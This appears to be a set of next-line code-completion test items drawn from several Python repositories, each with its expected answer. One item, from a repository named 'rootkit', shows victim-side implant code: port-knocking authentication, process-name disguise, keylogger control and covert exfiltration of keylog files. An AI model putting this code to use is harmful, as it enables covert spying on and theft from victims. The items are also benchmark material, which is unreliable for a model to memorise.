Scene from leaf_playground.core.scene_definition import SceneConfig from leaf_playground.data.log_body import ActionLogBody from leaf_playground.data.media import Text, Json from .agents.examiner import Examiner from .agents.base_examinee import AIBaseExaminee from .dataset_utils import DatasetConfig from .scene_definition import ExamineeAnswer, ExaminerQuestion, MessageType, SCENE_DEFINITION class RagSceneLogBody(ActionLogBody): references: Optional[List[MessageType]] = Field(default=None) response: MessageType = Field(default=...) ground_truth: Optional[Json] = Field(default=None) RagSceneConfig = SceneConfig.create_config_model( SCENE_DEFINITION, additional_config_fields={"dataset_config": (DatasetConfig, Field(default=...))} ) class RagScene(Scene, scene_definition=SCENE_DEFINITION, log_body_class=RagSceneLogBody): config_cls = RagSceneConfig config: config_cls def __init__(self, config: config_cls, logger: Logger): super().__init__(config=config, logger=logger) self.examiner: Examiner = self.static_agents["examiner"][0] self.examinees: List[AIBaseExaminee] = self.agents["examinee"] async def _run(self): async def examinee_answer(examinee: AIBaseExaminee, q: ExaminerQuestion) -> None: try:
answer: ExamineeAnswer = await examinee.answer_question(question=q, examiner=self.examiner.profile)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: djkcyl/ABot-NT # Path: utils/message/picture.py class SelfPicture: def __init__(self) -> None: self.s3file = Launart.current().get_component(S3FileService).s3file async def from_name(self, name: str) -> Picture: url = await self.s3file.get_presigned_url(name) return Picture(UrlResource(url)) async def from_data(self, data: bytes | BytesIO, image_format: str | None = None) -> Picture: # 如果没有指定格式, 那么就尝试从 data 中获取 if not image_format: if isinstance(data, BytesIO): image = Image.open(data) data.seek(0) else: image = Image.open(BytesIO(data)) if image.format: image_format = image.format.lower() else: msg = "无法获取图片格式" raise ValueError(msg) # 防止后续操作 data 时出现问题, 先将 data 转换为 bytes if isinstance(data, BytesIO): data = data.getvalue() name = f"{token_hex(32)}.{image_format}" # 根据场景选择上传方式 ctx = Context.current if ctx.scene.path_without_land == "group": await self.s3file.put_object(name, data, f"image/{image_format}", "temp_image") return await self.from_name(name) if ctx.scene.path_without_land in {"guild.channel", "guild.user"}: return Picture(RawResource(data)) msg = "不支持的平台" raise NotImplementedError(msg) # Path: func/tool/mcping/statusping.py class StatusPing: def __init__(self, host: str = "localhost", port: int = 25565, timeout: int = 5): self._host = host self._port = port self._timeout = timeout @staticmethod def _unpack_varint(sock: socket.socket) -> int: data = 0 for i in range(5): ordinal = sock.recv(1) if len(ordinal) == 0: break byte = ord(ordinal) data |= (byte & 0x7F) << 7 * i if not byte & 0x80: break return data @staticmethod def _pack_varint(data: int) -> bytes: ordinal = b"" while True: byte = data & 0x7F data >>= 7 ordinal += struct.pack("B", byte | (0x80 if data > 0 else 0)) if data == 0: break return ordinal def _pack_data(self, data: str | int | float | bytes) -> bytes: # noqa: PYI041 if isinstance(data, str): data = data.encode("utf8") return self._pack_varint(len(data)) + data if isinstance(data, int): return struct.pack("H", data) if isinstance(data, float): return struct.pack("Q", int(data)) return data def _send_data(self, connection: socket.socket, *args: str | int | float | bytes) -> None: # noqa: PYI041 data = b"" for arg in args: data += self._pack_data(arg) connection.send(self._pack_varint(len(data)) + data) def _read_fully(self, connection: socket.socket, *, extra_varint: bool = False) -> bytes: packet_length = self._unpack_varint(connection) packet_id = self._unpack_varint(connection) byte = b"" if extra_varint: if packet_id > packet_length: self._unpack_varint(connection) extra_length = self._unpack_varint(connection) while len(byte) < extra_length: byte += connection.recv(extra_length) else: byte = connection.recv(packet_length) return byte def get_status(self) -> dict: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as connection: connection.settimeout(self._timeout) connection.connect((self._host, self._port)) self._send_data(connection, b"\x00\x00", self._host, self._port, b"\x01") self._send_data(connection, b"\x00") data = self._read_fully(connection, extra_varint=True) self._send_data(connection, b"\x01", time.time() * 1000) unix = self._read_fully(connection) response: dict = json.loads(data.decode("utf8")) response["ping"] = int(time.time() * 1000) - struct.unpack("Q", unix)[0] return response # Path: func/tool/mcping/mcping.py import asyncio import base64 import contextlib import json import re import dns.resolver from io import BytesIO from avilla.core import Picture from loguru import logger from PIL import Image from utils.message.picture import SelfPicture from .statusping import StatusPing def ping_status(host: str, port: int | None = None) -> dict: if port is None: with contextlib.suppress(Exception): srv_records = dns.resolver.query(f"_minecraft._tcp.{host}", "SRV") for srv in srv_records: host = str(srv.target).rstrip(".") port = srv.port break status_ping = StatusPing(host, port or 25565) status = status_ping.get_status() status_str = json.dumps(status) status_str = re.sub(r"\\u00a7.", "", status_str) status: dict = json.loads(status_str) logger.debug(status) return status def get_server_status(say: str) -> dict: host, _, port = say.partition(":") return ping_status(host, int(port) if port else None) async def handle_favicon(status: dict, messages: list[str | Picture]) -> None: if favicon := status.get("favicon"): byte_data = base64.b64decode(f"{favicon[22:-1]}=") img = Image.open(BytesIO(byte_data)).convert("RGB") image = BytesIO() img.save(image, format="JPEG", quality=90)
messages.append(await SelfPicture().from_data(image, "jpeg"))
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Chenyme/Chenyme-AAMT # Path: utils/utils.py def generate_srt_from_result(result): # 格式化为SRT字幕的形式 segments = result['segments'] srt_content = '' segment_id = 1 for segment in segments: start_time = int(segment['start'] * 1000) end_time = int(segment['end'] * 1000) text = segment['text'] srt_content += f"{segment_id}\n" srt_content += f"{milliseconds_to_srt_time_format(start_time)} --> {milliseconds_to_srt_time_format(end_time)}\n" srt_content += f"{text}\n\n" segment_id += 1 return srt_content # Path: utils/utils.py def tmp_filepath(uploaded_file): # 虚拟化文件路径 with tempfile.NamedTemporaryFile(delete=False) as tmp_file: tmp_file.write(uploaded_file.getvalue()) return tmp_file.name # Path: utils/utils.py def openai_translate(key, base, result): llm = ChatOpenAI(openai_api_key=key, openai_api_base=base) # Prompt prompt = ChatPromptTemplate( messages=[ SystemMessagePromptTemplate.from_template( "You are a senior translator proficient in Chinese and English. Your task is to translate whatever the user says. You only need to answer the translation result and do not use punctuation marks other than question marks. Please strictly implement it!" ), # The `variable_name` here is what must align with memory MessagesPlaceholder(variable_name="chat_history"), HumanMessagePromptTemplate.from_template("{question}"), ] ) # 设置记忆参数 memory = ConversationBufferWindowMemory(memory_key="chat_history", return_messages=True, k=5) conversation = LLMChain(llm=llm, prompt=prompt, verbose=False, memory=memory) segments = result['segments'] segment_id = 0 for segment in segments: text = segment['text'] response = conversation({"question": text}) result['segments'][segment_id]['text'] = response['text'] segment_id += 1 return result # Path: utils/utils.py def srt_mv(cache_dir): command = ' ffmpeg -i "' + "uploaded.mp4" + '" -lavfi ' + '"subtitles=' + 'output.srt' + ':force_style=' + "'BorderStyle=0,Outline=1,Shadow=0,Fontsize=18'" + '"' + ' -y -crf 1 -c:a copy "' + "output.mp4" + '"' subprocess.run(command, shell=True, cwd=cache_dir) # Path: utils/utils.py def cache(cache_dir): total_size = 0 # 总大小,初始为0 for root, dirs, files in os.walk(cache_dir): # 遍历文件夹中的所有文件和子文件夹 for file_name in files: file_path = os.path.join(root, file_name) total_size += os.path.getsize(file_path) return total_size # Path: utils/utils.py def convert_size(size): if size == 0: return "0B" size_names = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB") i = int(math.floor(math.log(size, 1024))) power = math.pow(1024, i) size = round(size / power, 2) return f"{size} {size_names[i]}" # Path: AAMT.py import os import json import streamlit as st import whisper from utils.utils import generate_srt_from_result, tmp_filepath, openai_translate, srt_mv, cache, convert_size # 作者:chenyme # 版本:v0.2.2 # 博客站:待更新 st.set_page_config( page_title="AAMT v0.2.2", page_icon="📊", layout="wide", # 设置布局样式为宽展示 initial_sidebar_state="expanded" # 设置初始边栏状态为展开 ) st.title("Chenyme-AAMT") st.write("##### AI全自动视频翻译") with st.sidebar: st.title("欢迎!") st.write(''' ### 尊敬的用户,恭喜你完成了该项目的安装! 欢迎您使用AAMT V0.2.2!本项目的目标是为您提供一个简单易用的全自动视频翻译工具,以便您能够快速地将翻译后的字幕与原视频合并,从而更轻松地享受翻译后的内容。 请注意以下事项: 1. 请确保您的系统已正确安装Python,并且版本号为3.8或更高。 2. 请确保已经安装了所有依赖库,并设置了ffmpeg为环境变量。 3. 如果在安装或运行过程中遇到任何问题,请查阅项目文档或联系开发人员以获取帮助。 ''') dir_1 = os.path.dirname(os.path.abspath(__file__)) dir_2 = dir_1.replace("\\", "/") config_dir = dir_2 + "/config/" cache_dir = dir_2 + "/cache/" print("当前项目的配置文件:", config_dir) print("当前项目的缓存位置:", cache_dir) with open(config_dir + "config.json", 'r') as file: # 读取配置 config = json.load(file) tab1, tab2, tab3 = st.tabs(["主页", "设置", "关于"]) with tab1: # 文件上传逻辑 uploaded_file = st.file_uploader("请在这里上传视频:", type=['mp4', 'mov']) if uploaded_file is not None: with open(cache_dir + "uploaded.mp4", "wb") as file: file.write(uploaded_file.getbuffer()) st.success("上传成功") if st.button('运行程序'): if uploaded_file is not None: with st.spinner('Wait for it...'): # whisper识别 model = whisper.load_model(st.session_state.option) pathvideo = tmp_filepath(uploaded_file) result = model.transcribe(pathvideo) print("whisper识别:" + result['text']) # whisper源语言识别内容
result = openai_translate(st.session_state.key, st.session_state.base, result) # 翻译成目标语言
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: davidrs/logo-buddy # Path: logo_buddy/controlnet.py def preprocess(image, controlnet_path=None): if "canny" in controlnet_path: return canny_preprocess(image) else: return Image.fromarray(image) # Path: logo_buddy/controlnet.py CN_MODELS = { "qr": "/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/controlnetQRPatternQR_v2Sd15.safetensors", "canny": "/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/control_canny-fp16.safetensors", "depth": "/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/control_depth-fp16.safetensors", } # Path: logo_buddy/utils.py def read_fit(img_path, max_width=768): image = cv2.imread(img_path) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # resize image to X width, keep ratio h, w, _ = image.shape new_w = max_width new_h = int(h * (new_w / w)) image = cv2.resize(image, (new_w, new_h)) return image # Path: logo_buddy/main.py import os import os.path as op import numpy as np import torch import cv2 import torch from glob import glob from diffusers import StableDiffusionPipeline, DiffusionPipeline from diffusers import ( StableDiffusionControlNetPipeline, ControlNetModel, UniPCMultistepScheduler, ) from diffusers.utils import load_image from PIL import Image from .controlnet import preprocess, CN_MODELS from .utils import read_fit STEPS = 34 SEED = 12 MODELS = { "real": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/realisticVisionV51_v51VAE.safetensors", "anim": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/revAnimated_v122EOL.safetensors", } # PROMPT_LIST = [ # Winter {"text": "santa playing in the snow, ethereal, dreamy, highly detailed, realistic lighting, sharp focus, rule of thirds, artgerm, wlop, arney freytag, hd, octane, 4 k, ", "file_name": "winter_santa", "model":"anim"}, # <lora:fantasy00d:0.5>, animated { "text": "ethereal fantasy concept art of dreamscape Winter wonderland, surreal, ethereal, dreamy, mysterious, fantasy, highly detailed, magnificent, celestial, ethereal, painterly, epic, majestic, magical, fantasy art, cover art, dreamy", "file_name": "winter_wonderland", "model": "anim", }, {"text": "((ginger bread house)), realistic, insanely detailed, octane rendered, unreal engine, illustration, trending on artstation, masterpiece, photography", "file_name": "winter_ginger", "model":"real"}, {"text": "winter ice sculpture ", "file_name": "winter_ice"}, # General {"text": "a neon glowing sign", "file_name": "neon"}, {"text": "hot air balloons ", "file_name": "hot_air_balloons", "model":"real"}, {"text": "(wood carving), (inlay), (etsy) ", "file_name": "wood_carving", "model":"real"}, { "text": "paper cut, paper layers, laser cut, paper art, vibrant colors, ", "file_name": "paper_art", "model": "real", }, # {"text": "carved halloween pumpkin, witches, spooky, fun, (vibrant colors:1.1), ", "file_name": "haloween", "model":"anim"}, # <lora:fantasy00d:0.5>, animated { "text": "fun textures and colours , logo, pixar, orange and pink clouds blue sky, sun, happy vibes, subtle lense flare, birds ", "file_name": "clouds", "model": "anim", }, ] DEFAULT_POSITIVE_SUFFIX = ( ",detailed, intricate, best quality, (highest quality, award winning:1.3)" ) DEFAULT_NEGATIVE_PROMPT = ( "blurry, low quality, low resolution, low res, low resolution, watermark, logo" ) OUT_DIR = "./out" os.makedirs(OUT_DIR, exist_ok=True) # env is mac, cpu or gpu DEVICE = "mps" if torch.cuda.is_available(): DEVICE = "gpu" def get_pipe(model_path, controlnet_path=None): controlnet_model = None if controlnet_path: # load control net and stable diffusion v1-5 controlnet_model = ControlNetModel.from_single_file( controlnet_path, torch_dtype=torch.float16, use_safetensors=True, device=DEVICE, ) pipe = StableDiffusionControlNetPipeline.from_single_file( model_path, use_safetensors=True, torch_dtype=torch.float16, controlnet=controlnet_model, ) pipe = pipe.to(DEVICE) # Recommended if your computer has < 64 GB of RAM pipe.enable_attention_slicing() return pipe def controlnet_generate(img_path, pipe, out_dir, prompts=PROMPT_LIST, controlnet=None): image = read_fit(img_path) preprocessed_image = None if controlnet: preprocessed_image = preprocess(image, controlnet_path=controlnet) for p in prompts: generator = torch.manual_seed(SEED) for i in range(0, 1): print(DEFAULT_POSITIVE_SUFFIX) print(p["text"]) steps = STEPS image = pipe( p["text"] + DEFAULT_POSITIVE_SUFFIX, negative_prompt=DEFAULT_NEGATIVE_PROMPT, num_inference_steps=steps, generator=generator, image=preprocessed_image, # guidance_scale=20 if 'qr' in controlnet else 15, # controlnet_conditioning_scale=2.0 if 'qr' in controlnet else 1.0, # strength=0.85, ).images[0] image.save(op.join(out_dir, f"{p['file_name']}_{controlnet}_{SEED}.png")) # if main if __name__ == "__main__": for m, mp in MODELS.items():
for cn, cn_path in CN_MODELS.items():
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Varexa/Gateway # Path: chat_exporter/ext/discord_import.py # Path: chat_exporter/ext/html_generator.py PARSE_MODE_NONE = 0 PARSE_MODE_NO_MARKDOWN = 1 PARSE_MODE_MARKDOWN = 2 PARSE_MODE_EMBED = 3 PARSE_MODE_SPECIAL_EMBED = 4 PARSE_MODE_REFERENCE = 5 PARSE_MODE_EMOJI = 6 async def fill_out(guild, base, replacements): def read_file(filename): # Path: chat_exporter/construct/assets/embed.py import html from chat_exporter.ext.discord_import import discord from chat_exporter.ext.html_generator import ( fill_out, embed_body, embed_title, embed_description, embed_field, embed_field_inline, embed_footer, embed_footer_icon, embed_image, embed_thumbnail, embed_author, embed_author_icon, PARSE_MODE_NONE, PARSE_MODE_EMBED, PARSE_MODE_MARKDOWN, PARSE_MODE_SPECIAL_EMBED, ) modules_which_use_none = ["nextcord", "disnake"] def _gather_checker(): if discord.module not in modules_which_use_none and hasattr(discord.Embed, "Empty"): return discord.Embed.Empty return None class Embed: r: str g: str b: str title: str description: str author: str image: str thumbnail: str footer: str fields: str check_against = None def __init__(self, embed, guild): self.embed: discord.Embed = embed self.guild: discord.Guild = guild async def flow(self): self.check_against = _gather_checker() self.build_colour() await self.build_title() await self.build_description() await self.build_fields() await self.build_author() await self.build_image() await self.build_thumbnail() await self.build_footer() await self.build_embed() return self.embed def build_colour(self): self.r, self.g, self.b = ( (self.embed.colour.r, self.embed.colour.g, self.embed.colour.b) if self.embed.colour != self.check_against else (0x20, 0x22, 0x25) # default colour ) async def build_title(self): self.title = html.escape(self.embed.title) if self.embed.title != self.check_against else "" if self.title: self.title = await fill_out(self.guild, embed_title, [ ("EMBED_TITLE", self.title, PARSE_MODE_MARKDOWN) ]) async def build_description(self): self.description = html.escape(self.embed.description) if self.embed.description != self.check_against else "" if self.description: self.description = await fill_out(self.guild, embed_description, [ ("EMBED_DESC", self.embed.description, PARSE_MODE_EMBED) ]) async def build_fields(self): self.fields = "" # This does not have to be here, but Pycord. if not self.embed.fields: return for field in self.embed.fields: field.name = html.escape(field.name) field.value = html.escape(field.value) if field.inline: self.fields += await fill_out(self.guild, embed_field_inline, [ ("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED), ("FIELD_VALUE", field.value, PARSE_MODE_EMBED) ]) else: self.fields += await fill_out(self.guild, embed_field, [ ("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED), ("FIELD_VALUE", field.value, PARSE_MODE_EMBED)]) async def build_author(self): self.author = html.escape(self.embed.author.name) if self.embed.author.name != self.check_against else "" self.author = f'<a class="chatlog__embed-author-name-link" href="{self.embed.author.url}">{self.author}</a>' \ if self.embed.author.url != self.check_against \ else self.author
author_icon = await fill_out(self.guild, embed_author_icon, [
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: mariaalfaroc/a2s-transformer # Path: my_utils/encoding_convertions.py VOICE_CHANGE_TOKEN = "<COC>" # Path: my_utils/encoding_convertions.py STEP_CHANGE_TOKEN = "<COR>" # Path: my_utils/metrics.py import os import shutil from music21 import converter as converterm21 from pyMV2H.utils.mv2h import MV2H from pyMV2H.metrics.mv2h import mv2h from pyMV2H.utils.music import Music from pyMV2H.converter.midi_converter import MidiConverter as Converter from .encoding_convertions import VOICE_CHANGE_TOKEN, STEP_CHANGE_TOKEN def compute_metrics(y_true, y_pred): ################################# Sym-ER and Seq-ER: metrics = compute_ed_metrics(y_true=y_true, y_pred=y_pred) ################################# MV2H: mv2h_dict = compute_mv2h_metrics(y_true=y_true, y_pred=y_pred) metrics.update(mv2h_dict) return metrics #################################################################### SYM-ER AND SEQ-ER: def compute_ed_metrics(y_true, y_pred): def levenshtein(a, b): n, m = len(a), len(b) if n > m: a, b = b, a n, m = m, n current = range(n + 1) for i in range(1, m + 1): previous, current = current, [i] + [0] * n for j in range(1, n + 1): add, delete = previous[j] + 1, current[j - 1] + 1 change = previous[j - 1] if a[j - 1] != b[i - 1]: change = change + 1 current[j] = min(add, delete, change) return current[n] ed_acc = 0 length_acc = 0 label_acc = 0 for t, h in zip(y_true, y_pred): ed = levenshtein(t, h) ed_acc += ed length_acc += len(t) if ed > 0: label_acc += 1 return { "sym-er": 100.0 * ed_acc / length_acc, "seq-er": 100.0 * label_acc / len(y_pred), } #################################################################### MV2H: def compute_mv2h_metrics(y_true, y_pred): def krn2midi(in_file): a = converterm21.parse(in_file).write("midi") midi_file = a.name shutil.copyfile(a, midi_file) os.remove(in_file) return midi_file def midi2txt(midi_file): txt_file = midi_file.replace("mid", "txt") converter = Converter(file=midi_file, output=txt_file) converter.convert_file() with open(txt_file, "r") as fin: f = [u.replace(".0", "") for u in fin.readlines()] with open(txt_file, "w") as fout: for u in f: fout.write(u) os.remove(midi_file) return txt_file ########################################### Polyphonic evaluation: def eval_as_polyphonic(): # Convert to MIDI reference_midi_file = krn2midi("true.krn") predicted_midi_file = krn2midi("pred.krn") # Convert to TXT reference_txt_file = midi2txt(reference_midi_file) predicted_txt_file = midi2txt(predicted_midi_file) # Compute MV2H reference_file = Music.from_file(reference_txt_file) transcription_file = Music.from_file(predicted_txt_file) res_dict = MV2H(multi_pitch=0, voice=0, meter=0, harmony=0, note_value=0) try: res_dict = mv2h(reference_file, transcription_file) except: pass # Remove auxiliar files os.remove(reference_txt_file) os.remove(predicted_txt_file) return res_dict ########################################### Monophonic evaluation: def get_number_of_voices(kern): num_voices = 0 for token in kern: if token == VOICE_CHANGE_TOKEN: continue
if token == STEP_CHANGE_TOKEN:
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: YashsviG/rootkit # Path: portknocker.py def port_knocking(victim_ip): """ Perform port knocking on the victim side to authenticate the commander. Args: victim_ip (str): IP address of the victim. Returns: tuple: IP address and port number if successful, None otherwise. """ potential_commanders = {} while True: packet = sniff(filter=f"tcp and dst {victim_ip}", count=1)[0] if TCP in packet and IP in packet: src_ip = packet[IP].src src_port = packet[TCP].dport if src_port in knock_ports: current_time = time.time() if src_ip not in potential_commanders: potential_commanders[src_ip] = [] potential_commanders[src_ip].append((src_port, current_time)) # Check if all knock ports have been hit within the timeout period print(potential_commanders) if len(potential_commanders[src_ip]) >= len(knock_ports): # Check for valid timestamps valid_timestamps = True for i, (port, timestamp) in enumerate(potential_commanders[src_ip]): if i == 0: continue previous_timestamp = potential_commanders[src_ip][i - 1][1] if abs(timestamp - previous_timestamp) > timeout: valid_timestamps = False potential_commanders.pop(src_ip) if valid_timestamps: # Successful port knocking sequence return src_ip, 7000 # Wait for the next packet time.sleep(0.1) # Path: processname.py def choose_process_name(): """ Choose a process name based on existing process names. Returns: str: Chosen process name. """ # Get a list of all existing process names existing_process_names = [p.name() for p in psutil.process_iter()] if existing_process_names: chosen_name = analyze_existing_process_names() else: chosen_name = "nvme-update-wq" print(f"Process name chosen {chosen_name}") return chosen_name # Path: utils.py def get_ip_address(): """ Get the local IP address of the machine. Returns: str: Local IP address. """ with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s: s.connect(("8.8.8.8", 80)) name = s.getsockname()[0] return name # Path: utils.py def transfer_keylog_file(keylogger, covert, file_path): """ Transfer the keylog file. Args: keylogger (Keylogger): Keylogger instance. covert (CovertChannel): Covert channel instance. file_path (str): Path of the keylog file. Returns: int: Status code (3 if unsuccessful). """ if keylogger.get_status(): print("VICTIM:: Cannot transfer, Keylogger running") return 3 if not os.path.exists(file_path): print("VICTIM:: keylog.txt does not exist") return 3 covert.cmd = 0 covert.send_data(for_victim=False) covert.cmd = None covert.file_name = file_path covert.send_data(for_victim=False, event="IN_CREATE") covert.file_name = None os.remove(file_path) # Path: utils.py def check_exists(path): """ Check if a file or directory exists. Args: path (str): Path to check. Returns: bool: True if exists, False otherwise. """ if os.path.exists(path): return True return False # Path: victim.py import argparse import setproctitle import shutil from keylogger import * from watcher import * from portknocker import port_knocking from processname import choose_process_name from utils import get_ip_address, transfer_keylog_file, check_exists def handle_command(command: int, keylogger, watcher, covert): """ Handle the received command. Args: command (int): Received command. keylogger (Keylogger): Keylogger instance. watcher (Watcher): Watcher instance. covert (CovertChannel): Covert channel instance. Returns: int: Result code. """ if command == 0: return 0 print(f"VICTIM:: Command Received", end=" ") if command == 1: print("VICTIM:: Received command to start the keylog program...") keylogger.start_keylogger() return 1 elif command == 2: print("VICTIM:: Received command to stop the keylog program...") if not keylogger.get_status(): print("VICTIM:: Keylogger is not running.") return 2 val = keylogger.stop_keylogger() if val == 0: print("VICTIM:: Keylogger has been stopped.") return 2 elif command == 3: print("VICTIM:: Received command to transfer the keylog file...") return transfer_keylog_file(keylogger, covert, "keylog.txt") elif command == 4: print(f"VICTIM:: Received command to watch file...") file = covert.receive_data(for_victim=True)
i = check_exists(file)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: yacinxx/dnakey # Path: profile_config/config_manager.py class ConfigManager: def __init__(self, prime_key:str) -> None: with open("profile_config/profile_config.json", "r") as f: self.profile_data = __import__("json").loads(f.read()) self.profile_config = self.profile_data["profiles_config"] self.prime_key = prime_key self.create_date = datetime.datetime.now() self.formatted_datetime = self.create_date.isoformat() def configuration(self): return self.profile_config def update_created_profiles(self): self.profile_config[self.prime_key]["created_profiles"] +=1 toast(":orange[**1 Profile has been added to your prime key**]", icon="🍨") return self.profile_config[self.prime_key]["created_profiles"] def get_date_time(self): return self.profile_config[self.prime_key]["date_time"] def update_date_time(self): if self.profile_config[self.prime_key]["date_time"] is None: self.profile_config[self.prime_key].update({"date_time": self.formatted_datetime}) success("**You 'Prime Key' has been activated successfully!**", icon="🍧") snow() def update_profile_activity(self, id_profile:int, activate_merge:bool, save_cookies:bool, formatted_datetime:str) -> None: self.action = self.profile_config[self.prime_key]["profile_activity"]["action"] if id_profile not in self.action: self.action.update({id_profile:{ "active_usage": 0, "active_merge": activate_merge, "date_time": formatted_datetime, "request_status": "online", "save_cookies": save_cookies, "version": VERSION} }) def get_created_profiles(self): return self.profile_config[self.prime_key]["created_profiles"] def get_active_profiles(self): active_profiles_ids = [] active_profiles = 0 active_profiles_list = list(self.profile_config[self.prime_key]["profile_activity"]["action"]) for i in active_profiles_list: if self.profile_config[self.prime_key]["profile_activity"]["action"][i]["active_usage"] != 0: active_profiles+=1 active_profiles_ids.append(f"id:{i}") return active_profiles, active_profiles_ids if len(active_profiles_ids) != 0 else "" def get_online_profiles(self): all_profiles_online = [] active_profiles_list = list(self.profile_config[self.prime_key]["profile_activity"]["action"]) for i in active_profiles_list: if self.profile_config[self.prime_key]["profile_activity"]["action"][i]["request_status"] == "online": all_profiles_online.append("online") else: all_profiles_online.append("offline") if all(profile == "online" for profile in all_profiles_online): return "Online!" else: return "Not all profiles are online!" def check_active_usage(self): all_profiles_active_usage = [] for i in list(self.profile_config[self.prime_key]["profile_activity"]["action"]): all_profiles_active_usage.append(self.profile_config[self.prime_key]["profile_activity"]["action"][i]["active_usage"]) if all(profile == 0 for profile in all_profiles_active_usage): return "first_time" def get_profile_active_usage(self, id_profile:str) -> int: return self.profile_config[self.prime_key]["profile_activity"]["action"][id_profile]["active_usage"] def update_profile_active_usage(self, id_profile:str) -> None: self.profile_config[self.prime_key]["profile_activity"]["action"][id_profile]["active_usage"] +=1 def get_merge_active_usage(self): return len(list(self.profile_config[self.prime_key]["profile_activity"]["action_merge"])) def get_profile_action_merge(self, id_profile:str) -> list[int]: get_merge = self.profile_config[self.prime_key]["profile_activity"]["action_merge"][id_profile] action_merge_len = len(list(get_merge.keys())) action_merge = sum(list(get_merge.values())) return action_merge_len, action_merge def update_profile_action_merge(self, id_profile:str, merge_with:str) -> None: action_merge = self.profile_config[self.prime_key]["profile_activity"]["action_merge"] if id_profile not in list(action_merge.keys()): action_merge.update({id_profile:{f"({id_profile},{merge_with})": 0}}) if id_profile in list(action_merge.keys()): if f"({id_profile},{merge_with})" in list(action_merge[id_profile].keys()): action_merge[id_profile][f"({id_profile},{merge_with})"] +=1 else: action_merge[id_profile].update({f"({id_profile},{merge_with})": 0}) action_merge[id_profile][f"({id_profile},{merge_with})"] +=1 def update_config(self): with open("profile_config/profile_config.json", "w") as f: __import__("json").dump(self.profile_data, f, indent=3) # Path: license/license_manager.py VERSION = license_data["version"] # Path: enginev2.py from cryptography.fernet import Fernet from profile_config.config_manager import ConfigManager from license.license_manager import VERSION import random, json, string, datetime class DNAEngine(): def __init__( self, has_key="test", profile_name="profile_test", activate_merge=True, save_cookies=True, **advance_settings): self.has_key = has_key self.profile_name = profile_name self.length = advance_settings.get("length", 40) self.has_lower = advance_settings.get("has_lower", True) self.has_upper = advance_settings.get("has_upper", True) self.has_number = advance_settings.get("has_number", True) self.has_symbol = advance_settings.get("has_symbol", False) self.has_arabic = advance_settings.get("has_arabic", False) self.activate_merge = activate_merge self.save_cookies = save_cookies # Create a Fernet object with the secret key secret_key = self.has_key.encode("utf-8") self.fernet = Fernet(secret_key) self.create_date = datetime.datetime.now() # Convert datetime to string self.formatted_datetime = self.create_date.isoformat() self.random_func = { "lower": self.get_random_lower, "upper": self.get_random_upper, "number": self.get_random_number, "symbol": self.get_random_symbol, "arabic": self.get_random_arabic } def create_id_profile(self): self.config_has_key = f"dnakey${self.has_key[:32:2]}"
self.config_manager = ConfigManager(self.config_has_key)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: tamnva/hydroecolstm # Path: hydroecolstm/model_run.py def run_train(config_file): # Load configuration config = read_config(config_file) # Read and split data data = read_train_test_data(config) # Scale/transformer name for static, dynamic, and target features x_scaler_name, y_scaler_name = get_scaler_name(config) # Scaler/transformer x_scaler, y_scaler = Scaler(), Scaler() x_scaler.fit(x=data["x_train"], method=x_scaler_name) y_scaler.fit(x=data["y_train"], method=y_scaler_name) # Scale/transform data x_train_scale = x_scaler.transform(x=data["x_train"]) x_test_scale = x_scaler.transform(x=data["x_test"]) y_train_scale = y_scaler.transform(x=data["y_train"]) # Create the model if config["model_class"] == "LSTM": model = Lstm_Linears(config) else: model = Ea_Lstm_Linears(config) # Train with train dataset trainer = Train(config, model) model, y_train_scale_simulated = trainer(x=x_train_scale, y=y_train_scale) # Simulated result with test dataset y_test_simulated_scale = model(x_test_scale) # Inverse scale/transform back simulated result to real scale data["y_train_simulated"] = y_scaler.inverse(y_train_scale_simulated) data["y_test_simulated"] = y_scaler.inverse(y_test_simulated_scale) return model, x_scaler, y_scaler, data, config # Path: hydroecolstm/utility/plot.py def plot(data: dict, object_id:str, train_test_period:str, target_feature:str): # Get key of observed and simulated target features y_observed = "y_" + train_test_period y_simulated = "y_" + train_test_period + "_simulated" time = "time_" + train_test_period # Get index of the target feature index = data["y_column_name"].index(target_feature) # Extract obeserved and target features from data y_observed = data[y_observed][object_id][:, index].detach().numpy() y_simulated = data[y_simulated][object_id][:, index].detach().numpy() time = data[time][object_id] # Now plot simulated and observed plt.plot(time, y_simulated, color = 'blue', label = "Simulated", alpha=0.9, linewidth=0.75) plt.plot(time, y_observed, color = 'red', label = "Observed", alpha=0.9, linewidth=0.75) plt.title(label=f"Object id = {object_id}, period = {train_test_period}") plt.ylabel(target_feature) plt.legend() return plt # Path: hydroecolstm/interface/main_gui.py 